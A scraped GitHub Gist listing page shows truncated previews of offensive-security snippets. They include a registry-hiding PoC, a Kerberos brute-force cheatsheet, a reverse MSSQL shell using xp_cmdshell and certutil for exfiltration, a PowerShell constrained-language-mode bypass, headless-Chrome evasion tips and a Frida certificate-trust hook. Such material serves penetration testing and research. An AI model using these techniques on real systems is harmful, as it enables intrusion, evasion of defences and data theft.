Skip to content

Instantly share code, notes, and snippets.


Myo Soe (aka Aung Khant) yehgdotnet

View GitHub Profile
szski / GraphQL-Introspection-Query-Url-Encoded
Created Oct 6, 2019
Append this string after to test for introspection query
View GraphQL-Introspection-Query-Url-Encoded
Graph-X /
Last active Oct 1, 2019
PoC for hiding things in the registry. My testing hasn't returned any errors when viewing in regedit
from Microsoft.Win32 import Registry
from time import sleep
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
rkey.SetValue(u'\x00 this is a test',u'\x00look at me!')
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
values = rkey.GetValueNames()
print("We have {0} values.".format(str(len(values))))
print("The value names returned are: {0}.".format(values[0]))
value = rkey.GetValue(u'\x00 this is a test')
TarlogicSecurity /
Created May 14, 2019
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet



python -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

mritunjay-k /
Last active Nov 24, 2019
Provide it a list of domains and it will show you which of them is 200 OK or 404 NOT FOUND (extremly helpful for web application bug hunting)
#!/usr/bin/env python
import requests
read_file = open(input("Enter path of the file containing subdomains: "),'r')
for host in read_file:
domain = host.rstrip("\n")
# Author: b0yd @rwincey
# Website:
# Setup:
# -------------------------------------------------
# pip install selenium
# wget
# google-chrome-stable --version
# Vist to identity the right version
# wget
xassiz /
Created Mar 16, 2018
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz

I’m looking for any tips or tricks for making chrome headless mode less detectable. Here is what I’ve done so far:

Set my args as follows:

const run = (async () => {

    const args = [
staaldraad /
Last active Jul 30, 2021
AWK to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
# Gawk version
# Remote
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk
# Local
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
mattifestation / RunscripthelperBypass.ps1
Created Oct 29, 2017
PowerShell weaponization for the runscripthelper.exe constrained language mode bypass
View RunscripthelperBypass.ps1
function Invoke-RunScriptHelperExpression {
Executes PowerShell code in full language mode in the context of runscripthelper.exe.
Invoke-RunScriptHelperExpression executes PowerShell code in the context of runscripthelper.exe - a Windows-signed PowerShell host application which appears to be used for telemetry collection purposes. The PowerShell code supplied will run in FullLanguage mode and bypass constrained language mode.
oleavr / trust-manager.js
Created Jun 8, 2017
How to implement an X509TrustManager using Frida
View trust-manager.js
'use strict';
var TrustManager;
var manager;
Java.perform(function () {
var X509TrustManager = Java.use('');
TrustManager = Java.registerClass({
name: 'com.example.TrustManager',